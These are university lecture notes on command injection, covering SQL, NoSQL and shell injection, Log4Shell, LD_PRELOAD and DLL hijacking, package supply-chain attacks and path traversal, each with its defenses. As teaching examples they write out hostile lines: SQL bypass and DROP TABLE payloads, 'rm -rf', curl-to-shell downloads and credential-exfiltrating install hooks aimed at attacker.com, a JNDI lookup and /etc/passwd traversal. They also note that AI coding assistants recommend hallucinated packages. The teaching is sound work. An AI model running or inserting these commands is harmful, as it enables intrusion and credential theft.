pk.org: Computer Security/Lecture Notes

Command Injection and Input Validation Attacks

From SQL injection to supply chain compromise

Paul Krzyzanowski – 2025-10-24

Introduction

Memory vulnerabilities like buffer overflows and use-after-free bugs allow attackers to corrupt a program's memory and hijack control flow. Command injection attacks achieve similar control but through a different mechanism: they exploit how programs construct and execute commands from user input.

When a program incorporates untrusted input into a command string—whether for a database query, a shell command, or a system call—an attacker can inject additional instructions that the interpreter will execute. Instead of overwriting memory to change what code runs, the attacker crafts input that changes what command runs.

Command injection is broader than memory corruption. It includes:

These attacks succeed because programs often trust user input when building commands. Proper input validation and safer APIs prevent most injection vulnerabilities, but subtle parsing behaviors and comprehension errors continue to create opportunities for attackers.


SQL Injection

SQL injection is the most common and most exploited form of command injection. It occurs when user input becomes part of a database query without proper validation.

How SQL injection works

Many applications take user input and incorporate it directly into an SQL query. Consider a simple login check:

sprintf(buf,
    "SELECT * FROM logininfo WHERE username = '%s' AND password = '%s';",
    uname, passwd);

This code creates a query by inserting the user-supplied username and password into a string. If the query returns results, the user is authenticated.

Now suppose an attacker enters this as a password:

' OR 1=1 ; --

The resulting query becomes:

SELECT * FROM logininfo WHERE username = 'paul' AND password = '' OR 1=1 ; -- ';

The -- begins an SQL comment, telling the database to ignore everything after it. In SQL, AND has higher precedence than OR, so the query evaluates as (username='paul' AND password='') OR (1=1). Since 1=1 is always true, the OR condition makes the entire expression true regardless of whether the AND portion succeeds.

The condition is always satisfied regardless of the actual password. The attacker has bypassed authentication entirely.

More destructive attacks

Authentication bypass is just one possibility. An attacker can use semicolons to chain multiple SQL statements:

'; DROP TABLE users; --

This transforms a simple lookup into a command that deletes an entire table. SQL injection can:

Why SQL injection persists

SQL injection has been well understood since the late 1990s, yet it remains one of the most common vulnerabilities. Several factors contribute to this:

String concatenation is intuitive: Building queries by concatenating strings feels natural to programmers and works correctly in normal cases. The problem only manifests when input contains SQL syntax.

Escaping is error-prone: Attempting to clean up input by escaping special characters is difficult. Different database systems have different quoting rules. A backslash might escape a quote in MySQL but not in PostgreSQL. Single quotes might need doubling in some systems. Programmers often implement incomplete or incorrect escaping.

Validation is insufficient: Checking for dangerous characters like quotes or semicolons seems reasonable but fails in subtle ways. Legitimate passwords or names may contain these characters. Different character encodings complicate detection. Attackers find clever encodings that bypass filters but execute as valid SQL.

Defenses against SQL injection

The most reliable defense is to avoid incorporating user input into the query structure itself.

Parameterized queries

A parameterized query separates the SQL command structure from the data values. The database receives these separately and never interprets data as SQL syntax.

uname = getResourceString("username");
passwd = getResourceString("password");
query = "SELECT * FROM users WHERE username = @0 AND password = @1";
db.Execute(query, uname, passwd);

The @0 and @1 markers are placeholders. The database knows these positions hold data values, not SQL code. Even if a password contains ' OR 1=1 --, the database treats it as a literal string, not as SQL syntax. The query structure cannot be altered.

Modern database libraries provide parameterized query interfaces in nearly every programming language. They eliminate SQL injection at the API level and should always be used when incorporating user input into queries.

Stored procedures

Stored procedures are predefined SQL functions that live in the database. They accept parameters but the SQL structure is fixed. Calling a stored procedure with user input has the same protective property as parameterized queries: the input is treated as data, never as code.

CREATE PROCEDURE CheckLogin(@username VARCHAR(50), @password VARCHAR(50))
AS
BEGIN
    SELECT * FROM users WHERE username = @username AND password = @password;
END

The application calls this procedure with username and password parameters. The SQL structure is immutable.

Input validation as a secondary defense

Parameterized queries and stored procedures are the primary defense. Input validation and sanitization add a second layer but cannot be the only protection.

Validation approaches

Allowlisting (whitelisting): Define what input is acceptable and reject everything else. This is the safest validation approach because it denies by default.

Example: If a field should only contain alphanumeric characters and hyphens:

import re
if re.match(r'^[a-zA-Z0-9-]+$', user_input):
    # Input is valid
else:
    # Reject input

Denylisting (blacklisting): Define what input is unacceptable and reject those patterns. This is less safe because attackers often find bypasses through encoding, alternate syntax, or patterns not on the denylist.

Example: Attempting to block SQL injection by rejecting quotes and semicolons:

if "'" in user_input or ";" in user_input:
    # Reject input

This approach fails against encoded attacks, legitimate uses of these characters, and other SQL syntax not covered by the denylist.

Sanitization techniques

When you must work with potentially dangerous input, sanitization modifies the input to make it safe.

Escaping special characters: Add escape sequences to neutralize characters that have special meaning. Different contexts require different escaping rules.

For SQL contexts, database libraries may provide escaping functions, but these are complex and error-prone:


# Example concept (implementation varies by database)

# Single quotes in SQL are typically escaped by doubling them
escaped = user_input.replace("'", "''")
query = f"SELECT * FROM users WHERE name = '{escaped}'"

# Still vulnerable to many attacks - parameterized queries are much safer

Critical limitations of SQL escaping:

Always prefer parameterized queries over any form of escaping.

Removing or replacing characters: Strip out or substitute dangerous characters entirely.


# Remove all non-alphanumeric characters
sanitized = re.sub(r'[^a-zA-Z0-9]', '', user_input)

General validation guidelines

Validation should:

Validation and sanitization catch mistakes and malformed input, but they should not be relied upon to stop SQL injection. Subtle bypasses and encoding issues make them unreliable as the sole defense.

Real-world SQL injection

SQL injection remains actively exploited. A June 2024 vulnerability in Fortra FileCatalyst Workflow, a file transfer application, allowed anonymous remote attackers to inject SQL through a jobID parameter used in a WHERE clause. The application built queries by concatenating user input without validation or parameterization.

SQL injection is not just a web application problem. Desktop applications, mobile apps, and embedded systems that interact with databases are all vulnerable if they construct queries from untrusted input.

Second-order SQL injection

A subtler variant is second-order SQL injection, where malicious input is stored in the database and later retrieved and used in another query without proper handling.

The attack unfolds in stages:

  1. Attacker submits malicious input that gets stored in the database

  2. The initial storage operation may properly escape the input

  3. Later, the application retrieves this data and uses it in a different query

  4. The second query treats the retrieved data as trusted and doesn't escape it

  5. The stored malicious SQL executes in the new context

For example:

Stage 1:

Stage 2:

A more dangerous example involves privilege escalation:

  1. The attacker sets their display name to: admin', role='admin'--

  2. Later, the admin user edits their own profile

  3. The application builds the query:

    UPDATE users SET display_name='...' WHERE username='admin', role='admin'--'

  4. The attacker's malicious display name executes, elevating their privileges

Defense: Treat ALL data as untrusted, even data retrieved from your own database. Always use parameterized queries regardless of data source. Never assume that because data came from your database, it's safe to use in SQL construction.


NoSQL Injection

NoSQL databases like MongoDB, CouchDB, and Redis use different query languages but are equally vulnerable to injection attacks. The injection mechanisms differ from SQL but the fundamental problem remains: mixing code and data.

MongoDB injection

MongoDB queries often use JSON-like structures. Consider this Node.js authentication code:

db.users.findOne({
    username: req.body.username,
    password: req.body.password
});

If the application passes user input directly from HTTP request body to the query, an attacker can send JSON objects instead of strings:

{
    "username": "admin",
    "password": { "$ne": null }
}

The $ne (not equal) operator makes the query check if the password is not null, which is always true for existing users. The attacker bypasses authentication without knowing the password.

MongoDB operator injection

MongoDB's query operators provide powerful injection vectors:

// Attacker input: { "$gt": "" }
// Query becomes: find all users where password is greater than empty string
db.users.findOne({ username: "admin", password: { "$gt": "" } });

// Attacker input: { "$regex": "^a" }
// Query becomes: find users whose password starts with 'a'
// Attacker can enumerate passwords character by character
db.users.findOne({ username: "admin", password: { "$regex": "^a" } });

JavaScript injection in MongoDB

Some MongoDB operations accept JavaScript code:

db.users.find({ "$where": "this.username == '" + username + "'" });

An attacker can inject arbitrary JavaScript:

username: "'; return true; //"

Resulting query:

db.users.find({ "$where": "this.username == ''; return true; //'" });

This returns all users regardless of username.

Defenses against NoSQL injection

Validate input types: Ensure strings are strings, not objects. Reject any input that contains MongoDB operators:

if (typeof req.body.username !== 'string' || typeof req.body.password !== 'string') {
    return res.status(400).send('Invalid input');
}

Use schema validation: Libraries like Mongoose provide type checking and validation:

const userSchema = new mongoose.Schema({
    username: { type: String, required: true },
    password: { type: String, required: true }
});

Avoid $where operator: The $where operator executes JavaScript and should never be used with user input. Prefer standard query operators.

Use allowlists for operators: If your application needs to support query operators from user input (such as search filters), explicitly allowlist which operators are permitted and validate their usage.

Cast to expected types: Explicitly convert input to expected types:

const username = String(req.body.username);
const password = String(req.body.password);

NoSQL injection demonstrates that injection vulnerabilities transcend specific database technologies. Any system that interprets user input as commands or operators is vulnerable.


Shell Command Injection

Shell command injection occurs when a program passes user-controlled input to a command interpreter. Unix-like shells—the standard shells on Linux, macOS, and Unix systems (sh, bash, zsh)—and Windows cmd.exe provide powerful command composition features that attackers can exploit.

The system() and popen() functions

The C standard library provides system() and popen() to execute shell commands. These functions pass their argument to a shell, which interprets it as a command.

system("/usr/bin/ls /home/user");

This spawns a shell that executes the ls command. The shell interprets special characters, expands variables, and handles redirection and pipes.

Consider a program that sends email alerts:

char command[BUFSIZE];
snprintf(command, BUFSIZE, "/usr/bin/mail -s \"alert\" %s", user);
FILE *fp = popen(command, "w");

If the user variable comes from untrusted input, an attacker can inject shell commands. Entering:

nobody; rm -rf /home/*

produces:

/usr/bin/mail -s "alert" nobody; rm -rf /home/*

The semicolon terminates the mail command and starts a new command. The shell executes both: first it mails nobody, then it deletes all user directories.

Shell metacharacters

Shells interpret many characters as special:

Character Purpose
; Command separator
& Background execution
| Pipe output to another command
&& Execute second command if first succeeds
|| Execute second command if first fails
$() or ` Command substitution
> and < Redirection
* and ? Filename wildcards

An attacker who controls any part of a string passed to a shell can use these to inject arbitrary commands.

Command substitution is particularly powerful. The sequence:

$(malicious_command)

executes malicious_command and substitutes its output into the command line. An attacker might inject:

user@example.com $(curl http://attacker.com/malware.sh | sh)

This downloads and executes a script from the attacker's server.

Real-world command injection

A February 2024 vulnerability in Fortinet's FortiSIEM security tool allowed attackers to exploit a Python script that called os.system() with a user-controlled mount_point value. An attacker could inject a semicolon followed by any command, which the application would execute with root privileges.

Remarkably, this was the second command injection vulnerability in the same product within six months. The earlier vulnerability used the same technique: concatenating user input into a shell command.

Defenses against shell command injection

Avoid shells entirely

The safest defense is to avoid shells when executing external programs. Use APIs that execute programs directly without shell interpretation:

These interfaces take the program path and arguments as separate parameters. The operating system executes the program directly. There is no shell to interpret special characters.

Example using execve():

extern char **environ;  // Declare environment variable array
char *args[] = {"/usr/bin/mail", "-s", "alert", user, NULL};
execve("/usr/bin/mail", args, environ);

The username is passed as a separate argument. Even if it contains semicolons or other shell metacharacters, they are treated as literal characters in the argument, not as shell syntax.

Input validation and sanitization

When shell use is unavoidable, combine validation and sanitization as defense-in-depth measures.

Allowlist validation

The safest approach is to accept only explicitly permitted characters or patterns. For example, if expecting a hostname for a ping command:

import re

# Only allow alphanumeric, dots, and hyphens
if re.match(r'^[a-zA-Z0-9.-]+$', user_host):
    os.system(f"ping {user_host}")
else:
    return "Invalid hostname"

This rejects any input containing shell metacharacters like semicolons, pipes, or command substitution syntax. Only hostnames matching the expected pattern are accepted.

Sanitization through escaping

If you must accept a broader range of input, use proper escaping to neutralize special characters. Python's shlex module provides reliable shell escaping:

import shlex
safe_input = shlex.quote(user_input)  # Adds proper escapes
os.system(f"command {safe_input}")

The shlex.quote() function returns a shell-escaped version of the string, typically by wrapping it in single quotes. For embedded single quotes, it uses the pattern '...'\"'\"'...' which safely passes the single quote through without allowing shell interpretation of metacharacters.

Combining validation and sanitization

For maximum safety, combine both approaches:

import re
import shlex

# First validate: only allow expected characters
if not re.match(r'^[a-zA-Z0-9._-]+$', user_filename):
    return "Invalid filename"

# Then sanitize as additional protection
safe_filename = shlex.quote(user_filename)
os.system(f"process_file {safe_filename}")

Important limitations

Input validation and sanitization alone are not reliable primary defenses:

These techniques should be secondary defenses. The primary defense is to avoid shells entirely by using APIs that execute programs directly.

Principle of least privilege

Run programs with the minimum privileges necessary. If a web application is compromised through command injection, running it as an unprivileged user limits the damage an attacker can cause. A command injection vulnerability in a root process can compromise the entire system. The same vulnerability in an unprivileged process may only compromise that process.

Language-specific injection risks

Modern programming languages provide their own command execution mechanisms, each with specific security considerations. Understanding language-specific pitfalls helps developers choose safe alternatives.

JavaScript and Node.js

eval() and Function() constructor: These functions execute arbitrary JavaScript code and should never be used with user input:

// DANGEROUS: Executes arbitrary code
eval(userInput);
new Function(userInput)();

// SAFE: Use JSON.parse() for parsing data structures
const data = JSON.parse(userInput);

child_process module: Node.js provides several ways to execute external programs. The safe and unsafe variants differ in whether they invoke a shell:

const { exec, execFile } = require('child_process');

// DANGEROUS: Invokes shell, interprets metacharacters
exec(`convert ${userFile} output.png`);

// SAFE: No shell, arguments passed directly to program
execFile('convert', [userFile, 'output.png']);

The spawn() function is also safe when used without the shell: true option.

Python

eval() and exec(): These functions execute Python code and must never receive untrusted input:


# DANGEROUS: Executes arbitrary Python code
eval(user_input)
exec(user_code)

# SAFE: Use ast.literal_eval() for parsing Python literals
import ast
data = ast.literal_eval(user_input)  # Only parses literals, not code

subprocess module: The subprocess module provides several functions. Always use shell=False (which is the default):

import subprocess

# DANGEROUS: shell=True enables shell interpretation
subprocess.run(f"ls {user_dir}", shell=True)

# SAFE: Arguments passed as list, no shell
subprocess.run(["ls", user_dir])  # shell=False is default

The subprocess.run() function with a list of arguments is the modern, safe approach. Older functions like os.system() and os.popen() should be avoided entirely.

Java

Runtime.exec(): Java's Runtime.exec() does not invoke a shell by default, but developers must use it correctly:

// DANGEROUS: Single string may be interpreted as shell command on some platforms
Runtime.getRuntime().exec("cmd.exe /c dir " + userDir);

// SAFE: Arguments array prevents shell interpretation
Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "dir", userDir});

ProcessBuilder: The modern Java approach uses ProcessBuilder, which provides better control:

ProcessBuilder pb = new ProcessBuilder("convert", userFile, "output.png");
Process p = pb.start();

Expression Language injection: Java web applications using JSP or JSF can execute code through Expression Language:

<!-- DANGEROUS: User input in EL expression -->
Welcome ${param.username}

<!-- SAFE: Escape output -->
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %>
Welcome ${fn:escapeXml(param.username)}

PHP

PHP has numerous command execution functions that should be avoided with user input:

// DANGEROUS: All of these invoke shells
system($cmd);
exec($cmd);
shell_exec($cmd);
passthru($cmd);
`$cmd`;  // Backticks execute shell commands

// SAFER: Use escapeshellarg() and escapeshellcmd()
$safe_arg = escapeshellarg($user_input);
system("program $safe_arg");

// BEST: Avoid shell execution entirely, use language features

Common patterns

Across all languages, the safe pattern is consistent:

  1. Avoid code execution functions: Don't use eval(), exec(), or similar functions with user input

  2. Avoid shells: Use APIs that execute programs directly without shell interpretation

  3. Pass arguments separately: Provide command and arguments as separate parameters, not as a single string

  4. Validate input: Even with safe APIs, validate that input conforms to expectations

Log4Shell: A Case Study in Injection Vulnerabilities

In December 2021, a critical vulnerability in Log4j (CVE-2021-44228), nicknamed Log4Shell, demonstrated how injection vulnerabilities can exist in unexpected places, even logging libraries. With a CVSS score of 10.0, it became one of the most severe and widespread vulnerabilities ever disclosed.

Log4j is a Java logging library used in millions of applications worldwide. Versions 2.0 through 2.14.1 contained a feature that performed JNDI (Java Naming and Directory Interface) lookups when it encountered certain expressions in log messages. An attacker could trigger remote code execution simply by getting a malicious string logged:

// Vulnerable code - looks completely innocuous
logger.info("User {} logged in", username);

If username contained ${jndi:ldap://attacker.com/Exploit}, Log4j would:

  1. Parse the JNDI expression

  2. Connect to the attacker's LDAP server

  3. Download a Java class

  4. Execute it in the application's context

The attack surface was enormous because any user-controlled data that got logged—usernames, User-Agent headers, form inputs, error messages—could trigger the vulnerability. Attackers began mass exploitation within hours of disclosure, targeting everything from enterprise applications to Minecraft servers.

Log4Shell illustrates several critical lessons:

  • Injection vulnerabilities exist wherever user input is interpreted: This wasn't SQL or shell commands; it was a logging library dynamically interpreting expressions.

  • Convenient features can be security disasters: JNDI lookup in log messages seemed useful but created a massive attack surface.

  • Ubiquitous dependencies amplify risk: Because Log4j was everywhere, a single vulnerability affected millions of systems.

  • Input validation must consider all interpreters: Even "safe" operations like logging can execute code if the library interprets special syntax.

The proper defense is the same as for other injection attacks: never let user input control code execution. Log4j 2.15.0+ disabled JNDI lookups by default, but the incident shows that secure-by-default design should extend to all components, including those that seem benign.


Environment Variable Attacks

Programs inherit environment variables from their parent process. These variables control program behavior in ways that can be exploited.

PATH manipulation

The PATH variable determines where the shell searches for commands. Consider:

PATH=/home/paul/bin:/usr/local/bin:/usr/bin:/bin

When a user or script runs ls, the shell searches these directories in order until it finds an executable named ls.

If an attacker can modify PATH or write to a directory in PATH that appears before system directories, they can plant a malicious program that will be executed instead of the intended command.

For example, if /usr/local/bin is writable and appears early in PATH, an attacker can create /usr/local/bin/ls containing:

#!/bin/sh

# Steal credentials, establish backdoor, etc.
/bin/ls "$@"  # Run the real ls to avoid suspicion

Now any script or user that runs ls will first execute the attacker's code.

Mitigation: Ensure PATH contains only trusted directories. Scripts that run with elevated privileges should set PATH explicitly:

#!/bin/sh
PATH=/usr/bin:/bin
export PATH

This prevents inherited PATH values from redirecting commands to attacker-controlled locations.

ENV and BASH_ENV variables

Some shells execute a script file when starting a non-interactive shell. The ENV variable (in POSIX shells) or BASH_ENV variable (in bash) specifies this initialization file.

If an attacker can set these variables, arbitrary commands run at the start of every shell script. This affects system scripts, cron jobs, and any program that spawns a subshell.

Mitigation: Unset these variables in security-sensitive contexts or ensure they cannot be controlled by untrusted users.

Shared Library Hijacking

Shared libraries contain code that multiple programs use. The dynamic linker loads these libraries when programs start. Both Linux/Unix and Windows allow attackers to redirect programs to load malicious libraries instead of legitimate ones, though the mechanisms differ.

Linux/Unix: LD_PRELOAD and LD_LIBRARY_PATH

Two environment variables control library loading on Linux and Unix systems:

LD_LIBRARY_PATH: A colon-separated list of directories to search for shared libraries before system directories

LD_PRELOAD: A list of shared libraries to load before all others, allowing functions in these libraries to override standard library functions

How LD_PRELOAD works

Consider a program that generates random numbers:

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
    srand(time(NULL));
    for (int i = 0; i < 10; i++)
        printf("%d\n", rand() % 100);
    return 0;
}

An attacker can create a replacement rand() function:

int rand(void) {
    return 42;
}

Compile it as a shared library:

gcc -shared -fPIC rand.c -o fake_rand.so

Set LD_PRELOAD and run the program:

export LD_PRELOAD=$PWD/fake_rand.so
./random

Output:

42
42
42
42
...

The program now uses the attacker's rand() instead of the standard library version. The program's behavior has been changed without recompiling or modifying the executable.

Function interposition

The power of LD_PRELOAD comes from function interposition: the attacker's function can call the original function after modifying parameters or adding behavior. This is more sophisticated than simple replacement.

Example: Intercepting file writes to log sensitive data:

#define _GNU_SOURCE
#include <dlfcn.h>
#include <unistd.h>
#include <string.h>

// Pointer to the real write() function
ssize_t (*real_write)(int fd, const void *buf, size_t count) = NULL;

ssize_t write(int fd, const void *buf, size_t count) {
    // First call: get pointer to the real write()
    if (!real_write) {
        real_write = dlsym(RTLD_NEXT, "write");
    }

    // Log the data being written
    if (fd == 1 || fd == 2) {  // stdout or stderr
        real_write(2, "[INTERCEPTED] ", 14);
        real_write(2, buf, count);
    }

    // Call the real write() to maintain normal behavior
    return real_write(fd, buf, count);
}

This interposed write() logs all output while still allowing the program to function normally. The victim program never knows its behavior is being monitored.

RTLD_NEXT tells the dynamic linker to find the next occurrence of the symbol (the real write()) after the current library. This enables transparent wrapping of library functions.

Attack scenarios

LD_PRELOAD and LD_LIBRARY_PATH enable several attacks through function interposition:

Protection mechanisms

Operating systems protect against these attacks in setuid and setgid programs (programs that run with elevated privileges, such as root):

However, these variables still affect programs running with the user's own privileges, which can be enough for many attacks.

Windows: DLL Search Order Attacks

Windows uses Dynamic Link Libraries (DLLs) for shared code. Like Linux's LD_PRELOAD, Windows' DLL loading mechanism can be exploited, though it works differently.

When a program loads a DLL without specifying a full path, Windows searches several locations in order:

  1. The directory containing the executable

  2. The system directory (C:\Windows\System32)

  3. The Windows directory (C:\Windows)

  4. The current working directory

  5. Directories in the PATH environment variable

DLL sideloading

An attacker can exploit this search order by placing a malicious DLL in a directory that is searched before the legitimate DLL. This is called DLL sideloading or DLL hijacking.

Example: If an application loads crypto.dll without a full path, and an attacker places a malicious crypto.dll in the same directory as the executable, the application will load the attacker's version instead of the system version.

Legitimate use: DLL redirection

The same mechanism serves a legitimate purpose. Legacy applications that require specific DLL versions can have those versions placed in the application's directory. The application loads its local version while other programs use the system version. This solves compatibility problems without modifying system libraries.

Mitigation

Windows developers can defend against DLL sideloading:

Common principles across platforms

Both LD_PRELOAD on Linux/Unix and DLL sideloading on Windows exploit the same fundamental weakness: programs load libraries by name without verifying their source. The attacks differ in mechanism—environment variables versus search order—but the outcome is identical: an attacker's code runs with the program's privileges.

The legitimate uses also mirror each other: both mechanisms exist to solve compatibility problems by allowing applications to use specific library versions. This dual-use nature—supporting both compatibility and exploitation—makes these features difficult to remove or restrict entirely.

Defense requires similar approaches on both platforms: use full paths when loading libraries, restrict search paths, verify library authenticity through signatures, and limit privileges so that even if library loading is compromised, the damage is contained.


Package Manager and Dependency Attacks

Modern development relies heavily on package managers (npm for JavaScript, pip for Python, Maven for Java, RubyGems for Ruby, NuGet for .NET) and third-party libraries. This dependency ecosystem creates new injection vectors where malicious code enters through the supply chain rather than through application vulnerabilities.

Unlike traditional injection attacks that exploit how applications process input, package manager attacks compromise the development environment itself. Malicious code executes during package installation or when the application imports the package, often before developers realize anything is wrong.

Typosquatting attacks

Typosquatting exploits common typing mistakes by creating packages with names similar to popular libraries. When developers make typos in their dependency files or install commands, they may download malicious packages instead of legitimate ones.

Common typosquatting patterns

Character transposition:

Missing or extra characters:

Separator variations:

Homoglyph attacks: Using visually similar Unicode characters:

Real-world typosquatting incidents

2017 PyPI attacks: Dozens of typosquat packages mimicking popular libraries (urllib, requests, setuptools) were discovered. They collected environment variables, SSH keys, and AWS credentials, sending them to attacker-controlled servers.

2019 RubyGems attack: The rest-client gem (downloaded millions of times) had a typosquat variant rest-client-stealth that installed cryptocurrency mining software.

2021 npm attack: Package ua-parser-js (8 million weekly downloads) was compromised when attackers gained access to the maintainer's account. Updated versions installed password stealers and cryptocurrency miners.

2022 Python ctx compromise: The ctx package was updated to steal AWS credentials after the original maintainer's account was hijacked. The package had been dormant for years before the malicious update.

2024 Python exfiltration campaign: Multiple packages discovered containing code that collected environment variables (AWS keys, database passwords, API tokens) and exfiltrated them to attacker servers during installation.

Dependency confusion

Dependency confusion exploits how package managers resolve dependencies when both public and private package repositories exist. This attack was first publicly demonstrated in 2021 and affected major technology companies.

How dependency confusion works

Many organizations maintain:

Package managers typically check public repositories or prioritize higher version numbers. An attacker can:

  1. Discover internal package names: Names leak through error messages, public GitHub repositories, bundled JavaScript files, or job postings

  2. Upload malicious packages to public repositories: Create packages with the same names as internal packages but with higher version numbers

  3. Wait for installation: Build systems or developers' machines fetch the malicious public package instead of the internal one

The 2021 Microsoft/Apple/Tesla incident

Security researcher Alex Birsan demonstrated dependency confusion by uploading harmless test packages mimicking internal package names he discovered from various companies. His packages were automatically downloaded and installed by:

The packages simply logged when and where they were installed, proving that malicious code could have executed with the same ease. Birsan responsibly disclosed the vulnerabilities and was awarded over $130,000 in bug bounties.

Defending against dependency confusion

Configure package manager priority: Set private repositories to be checked first:


# npm: Use .npmrc
@company:registry=https://internal-registry.company.com/

# pip: Use pip.conf or command-line
pip install --index-url https://internal-pypi.company.com/ --extra-index-url https://pypi.org/simple/ package-name

Use scoped packages: Scope names to your organization:

// npm packages scoped to @company
"dependencies": {
    "@company/internal-package": "1.0.0"
}

Package name reservation: Some package repositories allow reserving names. Register your internal package names on public repositories even if you don't publish them.

Network isolation: Restrict build systems' access to public package repositories, requiring all packages to flow through internal repositories first.

AI-assisted malware recommendations

Large language models and AI coding assistants can inadvertently recommend malicious or non-existent packages. As developers increasingly rely on AI for code suggestions, this creates a new supply chain risk.

Hallucinated packages

AI models may suggest package names that sound plausible but don't exist. Attackers monitor AI outputs and create packages with these hallucinated names.

Example:

Developer: "How do I parse YAML in Python?"
AI: "Use the yaml-parser package"  # Doesn't exist or is malicious
Developer: pip install yaml-parser  # Installs attacker's package

The legitimate package is PyYAML. The AI's suggested name sounds reasonable, and developers may install it without verification.

Outdated recommendations

AI models trained on historical data may recommend packages that were safe during training but have since been:

Context confusion

AI may misunderstand requirements and suggest packages with similar functionality from less reputable sources when secure, widely-used alternatives exist.

Defense

Verify package names: Never install packages based solely on AI recommendations. Check official documentation and package repository pages.

Cross-reference recommendations: Search for the package on the official repository website and verify download counts, last update date, and maintainer history.

Use established packages: When AI suggests an obscure package, search for alternatives with larger user bases and longer track records.

Package installation hooks

Package managers allow executing code during installation. Malicious packages exploit these hooks to run code before developers even import the package.

Installation script mechanisms

Python setup.py: Arbitrary Python code runs during pip install:


# setup.py
import os
import subprocess

# Malicious code executes during installation
subprocess.run(['curl', 'http://attacker.com', '-d', os.environ])

from setuptools import setup
setup(name='malicious-package', ...)

npm lifecycle scripts: Scripts run at different installation phases:

{
  "scripts": {
    "preinstall": "node malicious.js",
    "postinstall": "curl http://attacker.com/steal-credentials"
  }
}

Ruby Gems extensions: Can compile and run native code during installation.

What malicious installation scripts do

Once executed with the developer's privileges, malicious scripts can:

Steal credentials:

Establish persistence:

Exfiltrate data:

Cryptocurrency mining: Install miners that use CPU/GPU resources.

The code runs during installation, not when the package is imported or used. Developers may not notice until significant damage is done.

Defenses for developers

Verify package names carefully

Double-check spelling: Copy package names from official documentation rather than typing them.

Check package details before installing:

Pin exact versions

Specify exact versions in dependency files to prevent automatic updates to compromised versions:


# Python requirements.txt
requests==2.28.1  # Pin exact version, not >=2.28.1
// npm package.json
"dependencies": {
    "express": "4.18.2"  // Not ^4.18.2 which allows updates
}

Use lock files

Lock files ensure consistent versions across all environments:

Commit lock files to version control so all developers and build systems use identical dependency versions.

Review dependencies regularly

Audit tools scan for known vulnerabilities:

npm audit
pip-audit
bundle audit  # Ruby
mvn dependency-check:check  # Maven

Run these regularly and update packages with known security issues.

Minimize dependencies

Each dependency is a potential attack vector. Before adding a dependency:

Check package reputation

Before using a package:

Avoid packages with low downloads, recent creation dates, or single inactive maintainers.

Defenses for organizations

Private package repositories

Host approved packages in internal repositories:

Configure package managers to check internal repositories first or exclusively.

Package vetting process

Establish review procedures before allowing packages in production:

  1. Security team reviews package source code

  2. Automated scanning for known malware patterns

  3. Check package reputation and maintainer history

  4. Trial period in non-production environments

  5. Approval required before production use

Network controls

Restrict outbound access from build systems:

Software Bill of Materials (SBOM)

Maintain comprehensive inventory of all dependencies:

SBOM enables rapid response when vulnerabilities are discovered in dependencies.

Dependency scanning in CI/CD

CI/CD stands for Continuous Integration and Continuous Delivery, which are modern DevOps practices that automate the build, test, and deployment of software. his process creates a pipeline that allows development teams to deliver code changes more frequently and reliably. Checks can be added by integrating automated scanning into build pipelines:


# Example GitHub Actions workflow
- name: Scan dependencies
  run: |
    npm audit
    npm run snyk-test

- name: Fail on high-severity issues
  run: |
    npm audit --audit-level=high

Prevent deploying code with known vulnerable dependencies.

Why package attacks are effective

Package manager attacks succeed because:

Trust assumption: Developers assume public repositories are curated and safe. The repositories contain millions of packages; comprehensive manual review is impossible.

Transitive dependencies: Modern applications depend on hundreds of packages, most brought in indirectly. A single compromised dependency deep in the tree affects thousands of projects.

Automatic execution: Installation scripts run without user interaction or obvious warnings. The code executes before developers inspect the package.

Privilege escalation: Installation runs with developer or build system privileges, often including access to credentials and source code.

Wide impact: A single compromised popular package affects thousands or millions of projects. The left-pad incident in 2016 showed how removing one tiny npm package broke builds worldwide.

This is supply chain compromise: attacking the software supply chain rather than the final application. It's often more effective than finding vulnerabilities in well-maintained applications because:

Package management security requires vigilance at every level: individual developers verifying packages, organizations vetting dependencies, and repository maintainers implementing protective measures. The ecosystem's convenience creates systemic risk that all participants must actively mitigate.


Path Traversal Vulnerabilities

Path traversal attacks exploit how applications validate file paths. They allow attackers to access files outside the intended directory.

The basic attack

Web servers and other applications often accept file paths from users but intend to restrict access to a specific directory. For example, a web server might serve files only from /var/www/html.

An attacker can try to escape this restriction using .. (dot-dot), which refers to the parent directory:

http://example.com/../../../etc/passwd

If the application naively concatenates this to its base directory:

/var/www/html/../../../etc/passwd

it resolves to /etc/passwd, exposing the system password file.

Why path traversal is difficult to prevent

Simply blocking .. is insufficient. Consider these complications:

Dot-dot can appear anywhere in the path:

http://example.com/images/../../../../../../etc/passwd

Dot-dot is not always malicious:

http://example.com/docs/../index.html

This navigates to a parent and back down, which should be allowed if it stays within bounds.

Legitimate filenames can contain dots:

http://example.com/notes/file..with..dots.txt
http://example.com/notes/whatever../
http://example.com/notes/..more.stuff/

These should be accepted. The application cannot simply search for the substring ...

Multiple slashes are legal:

http://example.com////notes///////index.html

Unix treats multiple consecutive slashes as a single slash. This is valid and should not be rejected.

URL encoding obfuscates dots:

http://example.com/%2e%2e/%2e%2e/etc/passwd

Here %2e is the URL encoding for a dot. The application might check for .. before decoding, allowing the attack through.

Path equivalence

A related problem is path equivalence: different path strings that refer to the same file. Attackers use this to bypass security checks that examine the path string without resolving it.

Example: If a server blocks access to /admin/config.php, an attacker might try:

/admin/../admin/config.php

This reaches the same file but looks different to a string comparison. If the security check only examines the literal path string, it may not recognize this as a blocked path.

Internal dots and symbolic links

Paths can include . (single dot), which means "current directory":

/admin/./config.php
/admin/././././config.php

These resolve to /admin/config.php but don't match a simple string comparison for /admin/config.php.

Symbolic links add another layer of equivalence. A link from /public/data to /private/secrets means that /public/data/file.txt and /private/secrets/file.txt are the same file. An application that restricts access based on path prefixes may not account for this.

Platform-specific path parsing

Different operating systems and applications parse paths differently, creating additional attack opportunities.

Windows path conversion

Windows supports two path formats:

DOS-style:

C:\directory\file.txt

NT-style:

\??\C:\directory\file.txt

When Windows converts DOS paths to NT paths, it applies normalization rules. One rule removes trailing dots and spaces from path components. An attacker can exploit this:

This allows hiding files or processes in plain sight.

Apache Tomcat internal dot vulnerability

A 2025 vulnerability (CVE-2025-24813) in Apache Tomcat, actively exploited for eight years before discovery, involved path processing in servlets configured with write permissions.

The code generated temporary filenames by replacing path separators (/) with internal dots (.). This led to improper security checks. Attackers could:

Defenses against path traversal

Resolve paths to their absolute form before validation: Use operating system functions to resolve all ., .., symbolic links (shortcuts that point to other files), and alternate representations to a single absolute path. Then check whether this absolute path is within the allowed directory.

